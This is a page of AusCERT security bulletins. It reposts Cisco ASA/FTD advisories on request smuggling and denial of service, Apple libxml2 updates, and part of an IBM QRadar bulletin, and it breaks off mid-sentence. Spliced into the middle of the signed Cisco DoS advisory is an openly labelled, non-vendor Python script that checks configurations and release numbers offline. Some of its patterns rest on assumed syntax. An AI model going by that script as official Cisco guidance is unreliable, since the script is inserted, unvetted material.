AusCERT - Security Bulletins

Latest published security bulletins. See https://www.auscert.org.au/rss/ for feed information.
Updated: 10 minutes 23 seconds
ESB-2022.3979.2 - UPDATE [Cisco] Cisco Adaptive Security Appliance Software:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.3979.2
Cisco Adaptive Security Appliance Software Clientless SSL
VPN Client-Side Request Smuggling Vulnerability
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Cisco Adaptive Security Appliance Software
Publisher: Cisco Systems
Operating System: Cisco
Resolution: Mitigation
CVE Names: CVE-2022-20713
Original Bulletin:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-webvpn-LOeKsNmO
Comment: CVSS (Max): 4.3 CVE-2022-20713 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)
CVSS Source: Cisco Systems
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Revision History: November 10 2022: Vendor updated bulletin
August 11 2022: Initial Release
- --------------------------BEGIN INCLUDED TEXT--------------------
Cisco Adaptive Security Appliance and Firepower Threat Defense Software VPN Web
Client Services Client-Side Request Smuggling Vulnerability
Priority: Medium
Advisory ID: cisco-sa-asa-webvpn-LOeKsNmO
First Published: 2022 August 10 16:00 GMT
Last Updated: 2022 November 9 16:03 GMT
Version 2.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCwa04262
CVE Names: CVE-2022-20713
CWEs: CWE-444
Summary
o A vulnerability in the VPN web client services component of Cisco Adaptive
Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD)
Software could allow an unauthenticated, remote attacker to conduct
browser-based attacks against users of an affected device.
This vulnerability is due to improper validation of input that is passed to
the VPN web client services component before being returned to the browser
that is in use. An attacker could exploit this vulnerability by persuading
a user to visit a website that is designed to pass malicious requests to a
device that is running Cisco ASA Software or Cisco FTD Software and has web
services endpoints supporting VPN features enabled. A successful exploit
could allow the attacker to reflect malicious input from the affected
device to the browser that is in use and conduct browser-based attacks,
including cross-site scripting attacks. The attacker could not directly
impact the affected device.
There are no workarounds that address this vulnerability.
This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-webvpn-LOeKsNmO
Affected Products
o Vulnerable Products
At the time of publication, this vulnerability affected Cisco products if
they were running a vulnerable release of the following Cisco software:
ASA Software with Cisco AnyConnect VPN or Clientless SSL VPN enabled
FTD Software with Cisco AnyConnect VPN enabled
See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Determine the ASA Software Configuration
To determine whether the software has a vulnerable feature enabled, use the
show running-config CLI command. In the following table, the left column
lists the Cisco ASA Software features that are vulnerable. The right column
indicates the basic configuration for each feature from the show
running-config CLI command. If a device is running a vulnerable release and
has one of these features enabled, it is vulnerable.
+------------------------------------------------+--------------------------------------------+
| Cisco ASA Feature                              | Vulnerable Configuration                   |
+------------------------------------------------+--------------------------------------------+
| AnyConnect Internet Key Exchange Version 2     | crypto ikev2 enable client-services port   |
| Remote Access (with client services)           |                                            |
+------------------------------------------------+--------------------------------------------+
| AnyConnect SSL VPN                             | webvpn                                     |
|                                                |  enable                                    |
+------------------------------------------------+--------------------------------------------+
| Clientless SSL VPN                             | webvpn                                     |
|                                                |  enable                                    |
+------------------------------------------------+--------------------------------------------+
Determine the FTD Software Configuration
To determine whether the software has a vulnerable feature enabled, use the
show running-config CLI command. In the following table, the left column
lists the Cisco FTD Software features that are vulnerable. The right column
indicates the basic configuration for each feature from the show
running-config CLI command. If a device is running a vulnerable release and
has one of these features enabled, it is vulnerable.
+------------------------------------------------+--------------------------------------------+
| Cisco FTD Feature                              | Vulnerable Configuration                   |
+------------------------------------------------+--------------------------------------------+
| AnyConnect Internet Key Exchange Version 2     | crypto ikev2 enable client-services port   |
| Remote Access (with client services) ^1,2      |                                            |
+------------------------------------------------+--------------------------------------------+
| AnyConnect SSL VPN ^1,2                        | webvpn                                     |
|                                                |  enable                                    |
+------------------------------------------------+--------------------------------------------+
1. Remote Access VPN features were introduced in Cisco FTD Software Release
6.2.2.
2. Remote Access VPN features are enabled by using Devices > VPN > Remote
Access in Cisco Firepower Management Center (FMC) or by using Device >
Remote Access VPN in Cisco Firepower Device Manager (FDM).
Products Confirmed Not Vulnerable
Only products listed in the Vulnerable Products section of this advisory
are known to be affected by this vulnerability.
Cisco has confirmed that devices with remote access VPN services that are
configured to accept only AnyConnect Internet Key Exchange Version 2 Remote
Access VPN with client services disabled are not affected by this
vulnerability.
Workarounds
o There are no workarounds that address this vulnerability.
Fixed Software
o When considering software upgrades, customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page, to determine exposure and a complete
upgrade solution.
In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.
Fixed Releases
For information about fixed software releases, see the Details section in
the bug ID(s) at the top of this advisory.
Exploitation and Public Announcements
o The Cisco Product Security Incident Response Team (PSIRT) is aware that
proof-of-concept exploit code is available for the vulnerability described
in this advisory.
The Cisco PSIRT is not aware of any malicious use of the vulnerability that
is described in this advisory.
Source
o Cisco would like to thank James Kettle of Portswigger.net for reporting
this vulnerability.
Cisco Security Vulnerability Policy
o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy. This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.
Related to This Advisory
o
URL
o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-webvpn-LOeKsNmO
Revision History
o +---------+-----------------------+----------------+--------+-------------+
| Version | Description | Section | Status | Date |
+---------+-----------------------+----------------+--------+-------------+
| | Added FTD Software as | Title, | | |
| | an affected product. | Summary, | | |
| | Updated the affected | Vulnerable | | |
| | VPN component. | Products, | | |
| 2.0 | Clarified affected | Products | Final | 2022-NOV-09 |
| | software | Confirmed Not | | |
| | configurations. | Vulnerable, | | |
| | Removed the | and | | |
| | mitigation because it | Workarounds | | |
| | no longer applies. | | | |
+---------+-----------------------+----------------+--------+-------------+
| 1.0 | Initial public | - | Final | 2022-AUG-10 |
| | release. | | | |
+---------+-----------------------+----------------+--------+-------------+
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
-----END PGP SIGNATURE-----
ESB-2022.1912.2 - UPDATE [Cisco] Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.1912.2
Cisco Adaptive Security Appliance Software and Firepower Threat Defense
Software Web Services Interface Denial of Service Vulnerability
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Cisco Adaptive Security Appliance Software
Firepower Threat Defense Software
Publisher: Cisco Systems
Operating System: Cisco
Resolution: Patch/Upgrade
CVE Names: CVE-2022-20745
Original Bulletin:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asafdt-webvpn-dos-tzPSYern
Comment: CVSS (Max): 8.6 CVE-2022-20745 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)
CVSS Source: Cisco Systems
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
Revision History: November 10 2022: Vendor updated bulletin
April 29 2022: Initial Release
- --------------------------BEGIN INCLUDED TEXT--------------------
Cisco Adaptive Security Appliance Software and Firepower Threat Defense
Software Web Services Interface Denial of Service Vulnerability
Priority: High
Advisory ID: cisco-sa-asafdt-webvpn-dos-tzPSYern
First Published: 2022 April 27 16:00 GMT
Last Updated: 2022 November 9 16:02 GMT
Version 1.2: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvz70595 CSCwb87950 CSCwb93914
CVE Names: CVE-2022-20745
CWEs: CWE-20
Summary
o A vulnerability in the web services interface for remote access VPN
features of Cisco Adaptive Security Appliance (ASA) Software and Cisco
Firepower Threat Defense (FTD) Software could allow an unauthenticated,
remote attacker to cause a denial of service (DoS) condition.
This vulnerability is due to improper input validation when parsing HTTPS
requests. An attacker could exploit this vulnerability by sending a crafted
HTTPS request to an affected device. A successful exploit could allow the
attacker to cause the device to reload, resulting in a DoS condition.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asafdt-webvpn-dos-tzPSYern
This advisory is part of the April 2022 release of the Cisco ASA, FTD, and
FMC Security Advisory Bundled publication. For a complete list of the
advisories and links to them, see Cisco Event Response: April 2022 Cisco
ASA, FMC, and FTD Software Security Advisory Bundled Publication.
Affected Products
o Vulnerable Products
This vulnerability affects Cisco products if they are running a vulnerable
release of Cisco ASA Software or Cisco FTD Software with a vulnerable
remote access VPN configuration.
For information about which Cisco software releases are vulnerable, see the
Fixed Software section of this advisory.
Determine the ASA Software Configuration
To determine whether the software has a vulnerable feature configured, use
the show running-config CLI command. In the following table, the left
column lists the Cisco ASA Software features that are vulnerable. The right
column indicates the basic configuration for each feature from the show
running-config CLI command. If a device is running a vulnerable release and
has one of these features configured, it is vulnerable.
+------------------------------------------------+--------------------------------------------+
| Cisco ASA Feature                              | Vulnerable Configuration                   |
+------------------------------------------------+--------------------------------------------+
| AnyConnect Internet Key Exchange Version 2     | crypto ikev2 enable client-services port   |
| Remote Access (with client services)           |                                            |
+------------------------------------------------+--------------------------------------------+
| AnyConnect SSL VPN                             | webvpn                                     |
|                                                |  enable                                    |
+------------------------------------------------+--------------------------------------------+
| Clientless SSL VPN                             | webvpn                                     |
|                                                |  enable                                    |
+------------------------------------------------+--------------------------------------------+
Determine the FTD Software Configuration
To determine whether the software has a vulnerable feature configured, use
the show running-config CLI command. In the following table, the left
column lists the Cisco FTD Software features that are vulnerable. The right
column indicates the basic configuration for each feature from the show
running-config CLI command. If a device is running a vulnerable release and
has one of these features configured, it is vulnerable.
+------------------------------------------------+--------------------------------------------+
| Cisco FTD Feature                              | Vulnerable Configuration                   |
+------------------------------------------------+--------------------------------------------+
| AnyConnect Internet Key Exchange Version 2     | crypto ikev2 enable client-services port   |
| Remote Access (with client services) ^1,2      |                                            |
+------------------------------------------------+--------------------------------------------+
| AnyConnect SSL VPN ^1,2                        | webvpn                                     |
|                                                |  enable                                    |
+------------------------------------------------+--------------------------------------------+
1. Remote Access VPN features were introduced in Cisco FTD Software Release
6.2.2.
2. Remote Access VPN features are enabled by using Devices > VPN > Remote
Access in Cisco Firepower Management Center (FMC) or by using Device >
Remote Access VPN in Cisco Firepower Device Manager (FDM).
Products Confirmed Not Vulnerable
Only products listed in the Vulnerable Products section of this advisory
are known to be affected by this vulnerability.
Cisco has confirmed that this vulnerability does not affect Cisco Firepower
Management Center (FMC) Software.
Workarounds
o There are no workarounds that address this vulnerability.
Fixed Software
o Cisco has released free software updates that address the vulnerability
described in this advisory. Customers with service contracts that entitle
them to regular software updates should obtain security fixes through their
usual update channels.
Customers may only install and expect support for software versions and
feature sets for which they have purchased a license. By installing,
downloading, accessing, or otherwise using such software upgrades,
customers agree to follow the terms of the Cisco software license:
https://www.cisco.com/c/en/us/products/end-user-license-agreement.html
Additionally, customers may only download software for which they have a
valid license, procured from Cisco directly, or through a Cisco authorized
reseller or partner. In most cases this will be a maintenance upgrade to
software that was previously purchased. Free security software updates do
not entitle customers to a new software license, additional software
feature sets, or major revision upgrades.
The Cisco Support and Downloads page on Cisco.com provides information
about licensing and downloads. This page can also display customer device
support coverage for customers who use the My Devices tool.
When considering software upgrades, customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page, to determine exposure and a complete
upgrade solution.
In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.
Customers Without Service Contracts
Customers who purchase directly from Cisco but do not hold a Cisco service
contract and customers who make purchases through third-party vendors but
are unsuccessful in obtaining fixed software through their point of sale
should obtain upgrades by contacting the Cisco TAC:
https://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html
Customers should have the product serial number available and be prepared
to provide the URL of this advisory as evidence of entitlement to a free
upgrade.
Fixed Releases
In the following table(s), the left column lists Cisco software releases.
The center column indicates whether a release is affected by the
vulnerability described in this advisory and the first release that
includes the fix for this vulnerability. The right column indicates whether
a release is affected by any of the Critical or High SIR vulnerabilities
described in this bundle and which release includes fixes for those
vulnerabilities.
ASA Software
+----------------------------+-----------------------------+-----------------------------+
| Cisco ASA Software Release | First Fixed Release for     | First Fixed Release for     |
|                            | CSCvz70595                  | CSCwb87950 and CSCwb93914   |
+----------------------------+-----------------------------+-----------------------------+
| 9.6 and earlier ^1         | Not vulnerable.             | Not vulnerable.             |
| 9.7 ^1                     | Migrate to a fixed release. | Migrate to a fixed release. |
| 9.8                        | 9.8.4.44                    | 9.8.4.46                    |
| 9.9 ^1                     | Migrate to a fixed release. | Migrate to a fixed release. |
| 9.10 ^1                    | Migrate to a fixed release. | Migrate to a fixed release. |
| 9.12                       | 9.12.4.35                   | 9.12.4.52                   |
| 9.13 ^1                    | Migrate to a fixed release. | Migrate to a fixed release. |
| 9.14                       | 9.14.3.13                   | 9.14.4.16                   |
| 9.15                       | 9.15.1.21                   | Migrate to a fixed release. |
| 9.16                       | 9.16.2.7                    | 9.16.3.15                   |
| 9.17                       | Not vulnerable.             | 9.17.1.16                   |
| 9.18                       | Not vulnerable.             | 9.18.1.3                    |
+----------------------------+-----------------------------+-----------------------------+
1. Cisco ASA Software releases 9.7 and earlier, as well as releases 9.9,
9.10, and 9.13, have reached end of software maintenance. Customers are
advised to migrate to a supported release that includes the fix for this
vulnerability.
FTD Software
+----------------------------+---------------------------------------------------+-----------------------------+
| Cisco FTD Software Release | First Fixed Release for CSCvz70595                | First Fixed Release for     |
|                            |                                                   | CSCwb87950 and CSCwb93914   |
+----------------------------+---------------------------------------------------+-----------------------------+
| 6.1.0 and earlier ^1       | Not vulnerable.                                   | Not vulnerable.             |
| 6.2.2 ^1                   | Migrate to a fixed release.                       | Migrate to a fixed release. |
| 6.2.3                      | Migrate to a fixed release.                       | Migrate to a fixed release. |
| 6.3.0 ^1                   | Migrate to a fixed release.                       | Migrate to a fixed release. |
| 6.4.0                      | 6.4.0.13                                          | 6.4.0.16                    |
| 6.5.0 ^1                   | Migrate to a fixed release.                       | Migrate to a fixed release. |
| 6.6.0                      | 6.6.5.1                                           | 6.6.7.1                     |
| 6.7.0                      | Cisco_FTD_Hotfix_AA-6.7.0.4-2.sh.REL.tar          | Migrate to a fixed release. |
|                            | Cisco_FTD_SSP_FP1K_Hotfix_AA-6.7.0.4-2.sh.REL.tar |                             |
|                            | Cisco_FTD_SSP_FP2K_Hotfix_AA-6.7.0.4-2.sh.REL.tar |                             |
|                            | Cisco_FTD_SSP_Hotfix_AA-6.7.0.4-2.sh.REL.tar      |                             |
| 7.0.0                      | 7.0.2                                             | 7.0.4                       |
| 7.1.0                      | Not vulnerable.                                   | 7.1.0.3                     |
| 7.2.0                      | Not vulnerable.                                   | 7.2.1                       |
+----------------------------+---------------------------------------------------+-----------------------------+
1. Cisco FMC and FTD Software releases 6.2.2 and earlier, as well as
releases 6.3.0 and 6.5.0, have reached end of software maintenance.
Customers are advised to migrate to a supported release that includes the
fix for this vulnerability.
For instructions on upgrading your FTD device, see Cisco Firepower
Management Center Upgrade Guide.
The Cisco Product Security Incident Response Team (PSIRT) validates only
the affected and fixed release information that is documented in this
advisory.
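The configuration tables in both Cisco bulletins above ("Determine the ASA/FTD Software Configuration") and this bulletin's ASA fixed-release table describe checks an operator normally does by eye. The following Python script is an added example, not code from Cisco or AusCERT: it runs both checks offline against a saved `show running-config` dump and a release string. The two sample configurations are constructed; the interface and port operands in the match patterns are assumed from the ASA CLI syntax (the bulletin text dropped them); the release data is the ASA "First Fixed Release" table from this bulletin only (the FTD table is not encoded).

```python
"""
Offline check for the two things the Cisco advisory asks an operator to verify:
whether a saved `show running-config` contains a feature configuration the
advisory lists as vulnerable, and whether the running ASA release is at or past
the "First Fixed Release" for each bug.  Added example, not Cisco's or AusCERT's
code.  The configuration snippets are constructed samples; the interface/port
operands matched loosely below are assumed from the CLI syntax.
"""
import re

# Feature signatures from the advisory's ASA/FTD configuration tables.
FEATURE_PATTERNS = {
    # "crypto ikev2 enable <interface> client-services port <port>".  Plain
    # "crypto ikev2 enable <interface>" without client services is confirmed
    # not affected, so it must NOT match.
    "AnyConnect IKEv2 Remote Access (with client services)":
        re.compile(r"^crypto ikev2 enable\b.*\bclient-services port\b", re.M),
    # A "webvpn" block containing "enable <interface>".  The advisory lists
    # this same configuration for AnyConnect SSL VPN and Clientless SSL VPN.
    "AnyConnect SSL VPN / Clientless SSL VPN":
        re.compile(r"^webvpn[ \t]*\n(?:[ \t]+.*\n)*?[ \t]+enable[ \t]+\S+", re.M),
}

# ASA "First Fixed Release" table for CVE-2022-20745, copied from the advisory:
# (fix for CSCvz70595, fix for CSCwb87950 and CSCwb93914).  None = the train was
# never vulnerable to that bug; "migrate" = no fixed release exists in the train.
ASA_FIRST_FIXED = {
    "9.8":  ("9.8.4.44",  "9.8.4.46"),
    "9.12": ("9.12.4.35", "9.12.4.52"),
    "9.14": ("9.14.3.13", "9.14.4.16"),
    "9.15": ("9.15.1.21", "migrate"),
    "9.16": ("9.16.2.7",  "9.16.3.15"),
    "9.17": (None,        "9.17.1.16"),
    "9.18": (None,        "9.18.1.3"),
}
BUG_LABELS = ("CSCvz70595", "CSCwb87950/CSCwb93914")
END_OF_MAINTENANCE = {"9.7", "9.9", "9.10", "9.13"}   # footnote 1 of the table


def normalise_version(version):
    """Accept '9.16(2)3' as printed by `show version` or dotted '9.16.2.3'."""
    return re.sub(r"[()]", ".", version.strip()).strip(".")


def version_key(version):
    return tuple(int(part) for part in normalise_version(version).split("."))


def vulnerable_features(running_config):
    """Names of advisory-listed features present in the configuration dump."""
    return [name for name, pattern in FEATURE_PATTERNS.items()
            if pattern.search(running_config)]


def assess_asa_release(version):
    """Classify an ASA release against the fixed-release table.

    Returns (status, detail); status is 'not_vulnerable', 'fixed',
    'vulnerable', 'migrate' or 'unknown'.
    """
    key = version_key(version)
    train = ".".join(str(p) for p in key[:2])
    if train in END_OF_MAINTENANCE:
        return "migrate", f"{train} has reached end of software maintenance"
    if key[:2] <= (9, 6):
        return "not_vulnerable", "9.6 and earlier are not vulnerable"
    if train not in ASA_FIRST_FIXED:
        return "unknown", f"{train} is not listed in the advisory table"
    gaps = []
    for bug, fixed in zip(BUG_LABELS, ASA_FIRST_FIXED[train]):
        if fixed is None:
            continue                      # train never affected by this bug
        if fixed == "migrate":
            gaps.append(f"{bug}: no fix in {train}, migrate to a fixed release")
        elif key < version_key(fixed):
            gaps.append(f"{bug}: first fixed in {fixed}")
    if gaps:
        return "vulnerable", "; ".join(gaps)
    return "fixed", "release includes every fix the advisory lists"


# Constructed sample configurations (not taken from the bulletin).
EXPOSED_CONFIG = """\
hostname asa-edge-1
interface GigabitEthernet0/0
 nameif outside
 security-level 0
crypto ikev2 enable outside client-services port 443
webvpn
 enable outside
 anyconnect enable
"""

SAFE_CONFIG = """\
hostname asa-edge-2
crypto ikev2 enable outside
webvpn
 anyconnect image disk0:/anyconnect.pkg 1
"""

if __name__ == "__main__":
    for label, cfg in (("asa-edge-1", EXPOSED_CONFIG), ("asa-edge-2", SAFE_CONFIG)):
        print(label, "vulnerable features:", vulnerable_features(cfg) or "none")
    for v in ("9.16(2)3", "9.16.3.15", "9.15.1.30", "9.9.2.50", "9.6.4"):
        print(v, "->", assess_asa_release(v))
```

A device is only exposed when both results point the same way: a vulnerable release with none of the listed features configured is not affected, and a configuration hit on a release at or past the first fixed release in both columns is already remediated. The second sample deliberately shows the case the advisory calls out as not affected (IKEv2 remote access without client services, and a `webvpn` block that never enables an interface).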
Exploitation and Public Announcements
o The Cisco PSIRT is not aware of any public announcements or malicious use
of the vulnerability that is described in this advisory.
Source
o This vulnerability was originally found during the resolution of a Cisco
TAC support case.
Cisco would like to thank Saleh Iskandar from Indonesia for reporting that
the fix for the vulnerability was incomplete.
Cisco Security Vulnerability Policy
o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy. This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.
Related to This Advisory
o Cisco Event Response: April 2022 Cisco ASA, FMC, and FTD Software Security
Advisory Bundled Publication
URL
o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asafdt-webvpn-dos-tzPSYern
Revision History
o +---------+----------------------------+-----------+--------+-------------+
| Version | Description | Section | Status | Date |
+---------+----------------------------+-----------+--------+-------------+
| | Updated fixed release | | | |
| | tables to reflect | Fixed | | |
| 1.2 | additional fixes for Cisco | Software, | Final | 2022-NOV-09 |
| | bugs CSCwb87950 and | Source | | |
| | CSCwb93914. Also updated | | | |
| | source. | | | |
+---------+----------------------------+-----------+--------+-------------+
| 1.1 | Updated ASA 9.8 first | Fixed | Final | 2022-JUN-01 |
| | fixed release information. | Software | | |
+---------+----------------------------+-----------+--------+-------------+
| 1.0 | Initial public release. | - | Final | 2022-APR-27 |
+---------+----------------------------+-----------+--------+-------------+
- --------------------------END INCLUDED TEXT--------------------
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
-----END PGP SIGNATURE-----
ESB-2022.5793 - [Mac] macOS Ventura 13.0.1: CVSS (Max): 8.2
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5793
APPLE-SA-2022-11-09-2 macOS Ventura 13.0.1
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: macOS Ventura 13.0.1
Publisher: Apple
Operating System: macOS
Resolution: Patch/Upgrade
CVE Names: CVE-2022-40304 CVE-2022-40303
Original Bulletin:
https://support.apple.com/HT213504
Comment: CVSS (Max): 8.2 CVE-2022-40304 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)
CVSS Source: Red Hat
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2022-11-09-2 macOS Ventura 13.0.1
macOS Ventura 13.0.1 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/HT213504.
libxml2
Available for: macOS Ventura
Impact: A remote user may be able to cause unexpected app termination
or arbitrary code execution
Description: An integer overflow was addressed through improved input
validation.
CVE-2022-40303: Maddie Stone of Google Project Zero
libxml2
Available for: macOS Ventura
Impact: A remote user may be able to cause unexpected app termination
or arbitrary code execution
Description: This issue was addressed with improved checks.
CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project
Zero
All information is also posted on the Apple Security Updates
web site: https://support.apple.com/en-us/HT201222.
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
- -----BEGIN PGP SIGNATURE-----
- -----END PGP SIGNATURE-----
- --------------------------END INCLUDED TEXT--------------------
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
-----END PGP SIGNATURE-----
ESB-2022.5792 - [Apple iOS] Apple: CVSS (Max): 8.2
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5792
APPLE-SA-2022-11-09-1 iOS 16.1.1 and iPadOS 16.1.1
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: iOS 16.1.1
iPadOS 16.1.1
Publisher: Apple
Operating System: Apple iOS
Resolution: Patch/Upgrade
CVE Names: CVE-2022-40304 CVE-2022-40303
Original Bulletin:
https://support.apple.com/HT213505
Comment: CVSS (Max): 8.2 CVE-2022-40304 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)
CVSS Source: Red Hat
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2022-11-09-1 iOS 16.1.1 and iPadOS 16.1.1
iOS 16.1.1 and iPadOS 16.1.1 address the following issues.
Information about the security content is also available at
https://support.apple.com/HT213505.
libxml2
Available for: iPhone 8 and later, iPad Pro (all models), iPad Air
3rd generation and later, iPad 5th generation and later, and iPad
mini 5th generation and later
Impact: A remote user may be able to cause unexpected app termination
or arbitrary code execution
Description: An integer overflow was addressed through improved input
validation.
CVE-2022-40303: Maddie Stone of Google Project Zero
libxml2
Available for: iPhone 8 and later, iPad Pro (all models), iPad Air
3rd generation and later, iPad 5th generation and later, and iPad
mini 5th generation and later
Impact: A remote user may be able to cause unexpected app termination
or arbitrary code execution
Description: This issue was addressed with improved checks.
CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project
Zero
All information is also posted on the Apple Security Updates
web site: https://support.apple.com/en-us/HT201222.
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
- -----BEGIN PGP SIGNATURE-----
- -----END PGP SIGNATURE-----
- --------------------------END INCLUDED TEXT--------------------
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
-----END PGP SIGNATURE-----
ESB-2022.5791 - [Linux] IBM QRadar Network Packet Capture Software: CVSS (Max): 9.8
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5791
Security Bulletin: IBM QRadar Network Packet Capture
includes components with multiple known vulnerabilities.
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: IBM QRadar Network Packet Capture Software
Publisher: IBM
Operating System: Linux variants
Resolution: Patch/Upgrade
CVE Names: CVE-2022-40674 CVE-2022-38177 CVE-2022-29154
CVE-2022-2526
Original Bulletin:
https://www.ibm.com/support/pages/node/6838295
Comment: CVSS (Max): 9.8 CVE-2022-40674 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS Source: IBM
Calculator: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
IBM QRadar Network Packet Capture includes components with multiple known
vulnerabilities.
Document Information
Document number : 6838295
Modified date : 09 November 2022
Product : IBM QRadar Network Packet Capture Software
Software version : 7.4, 7.5
Operating system(s): Linux
Summary
The product includes multiple vulnerable components (e.g., framework libraries)
that may be identified and exploited with automated tools. IBM has addressed
the relevant CVEs.
Vulnerability Details
CVEID: CVE-2022-29154
DESCRIPTION: Rsync could allow a remote attacker to bypass security
restrictions, caused by improper validation of file names. By utilizing
man-in-the-middle attack techniques, an attacker could exploit this
vulnerability to write arbitrary files inside the directories of connecting
peers.
CVSS Base score: 7.5
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
232637 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)
CVEID: CVE-2022-38177
DESCRIPTION: ISC BIND is vulnerable to a denial of service, caused by a small
memory leak in the DNSSEC verification code for the ECDSA algorithm. By
spoofing the target resolver with responses that have a malformed ECDSA
signature, a remote attacker could exploit this vulnerability to cause named to
crash.
CVSS Base score: 7.5
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
236705 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
CVEID: CVE-2022-40674
DESCRIPTION: libexpat could allow a remote attacker to execute arbitrary code
on the system, caused by a use-after-free in the doContent function in
xmlparse.c. An attacker could exploit this vulnerability to execute arbitrary
